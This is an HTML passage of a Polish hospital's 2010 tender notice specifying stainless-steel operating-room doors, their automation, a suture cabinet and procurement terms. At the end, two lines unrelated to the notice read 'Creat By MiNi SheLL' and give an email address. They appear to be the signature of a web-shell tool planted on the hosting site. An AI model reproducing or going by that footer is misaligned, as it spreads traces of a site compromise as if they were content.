g)	dopuszczalne uruchamianie automatyki drzwi również za pomocą sensorycznego bezdotykowego czujnika zbliżeniowego zamontowanego po dwóch stronach drzwi uruchamianego poprzez zbliżenie dłoni 
h)	Miejsce montażu do uzgodnienia w nadzorze inwestorskim.
i)	należy dołączyć do oferty kartę katalogową oferowanego systemu automatyki drzwi
Wymagania dotyczące drzwi uchylnych z pomieszczeń przygotowania lekarzy na sale operacyjne:
a)	drzwi uchylne ze stali chromowo-niklowej materiał EN 1.4301 (AISI 304)
b)	skrzydło wykonane w technologii warstwowej odpornej na uderzenie licowane stalą chromowo-niklową materiał EN 1.4301 (AISI 304),
c)	grubość skrzydła drzwiowego min 35 mm 
d)	skrzydło powinno być wykonane bez jakichkolwiek połączeń na frontowej stronie drzwi
e)	ościeżnica wykonana  ze stali chromowo-niklowej materiał EN 1.4301 (AISI 304) 
f)	grubość ościeżnicy minimum 2,0 mm,
g)	na powierzchni czołowej skrzydła powinien być zamontowany gumowy profil uszczelniający dociskany do zewnętrznej części ościeżnicy, który jednocześnie amortyzuje zamykane drzwi
h)	ościeżnica zintegrowana z zabudową panelową ścienną, ościeżnica licowana z powierzchnią panelu ściennego
i)	ościeżnica powinna być montowana bez widocznych mocowań do ściany,
j)	wyrównanie potencjałów zgodnie z wymaganiami dla sal operacyjnych - wymagane jest doprowadzenie do jednego miejsca zbiorczego wyrównania potencjałów
k)	konstrukcja skrzydła powinna umożliwiać otwieranie ręczne w przypadku braku zasilania lub awarii automatyki,
l)	wszystkie dodatkowe elementy skrzydła (okucia, pochwyty itp.) wykonane ze stali chromowo-niklowej materiał EN 1.4301 (AISI 304),
m)	okna obserwacyjne w każdych drzwiach, wymiary okna około 400 x 600 mm, szklone podwójnym szkłem bezpiecznym
n)	należy dołączyć do oferty kartę katalogową oferowanych drzwi przesuwnych
Wymagania dla automatyki do drzwi uchylnych:
a)	regulowana szybkość ruchu,
b)	płynna regulacja czasu podtrzymania otwarcia skrzydła drzwiowego,
c)	mechanizm powinien umożliwiać otwieranie ręczne w przypadku braku zasilania, 
d)	redukcja prędkości przesuwu drzwi w końcowej fazie zamykania drzwi,
e)	system automatyki zgodny z wymaganiami ppoż w zakresie współpracy z systemem sygnalizacji alarmu pożaru
f)	uruchamianie automatyki drzwiowej powinno następować za pomocą listwy uderzeniowej - zamontowanej na ścianie  lub ościeżnicy drzwi o długości min. 1200 mm. Dotknięcie dowolnej części listwy uderzeniowej powoduje uruchomienie automatyki drzwi. Listwy zamontowane po dwóch stronach drzwi. 
g)	dopuszczalne uruchamianie automatyki drzwi również za pomocą sensorycznego bezdotykowego czujnika zbliżeniowego zamontowanego po dwóch stronach drzwi uruchamianego poprzez zbliżenie dłoni. 
h)	Miejsce montażu do uzgodnienia w nadzorze inwestorskim.
i)	należy dołączyć do oferty kartę katalogową oferowanego systemu automatyki drzwi
Inne wymagania
Wykonanie wyrównania potencjałów dla konstrukcji zabudowy oraz drzwi - przewody wyrównania potencjałów doprowadzone do jednego miejsca zbiorczego wyrównania potencjałów
Szafka na nici chirurgiczne jedna na każdej sali operacyjnej:
a)	wykonana ze stali chromowo-niklowej materiał EN 1.4301 (AISI 304),
b)	drzwi przeszklone
c)	półki szklane,
d)	szafka wbudowana w panel ścienny, stanowiąca integralną część panelowego systemu ochrony sanitarno epidemiologicznej sal operacyjnych
e)	wymiar minimum 1070 x 600 x 150
f)	należy dołączyć do oferty kartę katalogową oferowanej szafki na nici chirurgiczne
Zegar wbudowany w system panelowy zlicowany z zabudową panelową jeden na salę operacyjną
System zabudowy powinien posiadać deklarację zgodności oraz atest higieniczny lub równoważny dokument.</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>przedłużenie terminu wykonania przedmiotu umowy może nastąpić, w formie aneksu do umowy, w razie: 
a)	udzielenia przez Zamawiającego dodatkowych zamówień Wykonawcy, których wykonanie stało się konieczne na skutek sytuacji, których nie można było przewidzieć oraz gdy z przyczyn technicznych lub gospodarczych ich wykonania nie można oddzielić od wykonania przedmiotu umowy,
b)	wystąpienia innych okoliczności poza takimi, jakie wynikają z uchybienia Wykonawcy lub za które Wykonawca jest odpowiedzialny, w szczególności działania siły wyższej lub przerw w dostawach nośników energii.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.spskgruca.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Szpital Kliniczny 
im. prof. Adama Grucy CMKP
ul. Konarskiego 13
05-400 Otwock
Dział Zamówień Publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.10.2010 godzina 09:00, miejsce: Samodzielny Publiczny Szpital Kliniczny 
im. prof. Adama Grucy CMKP
ul. Konarskiego 13
05-400 Otwock
Dział Zamówień Publicznych.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com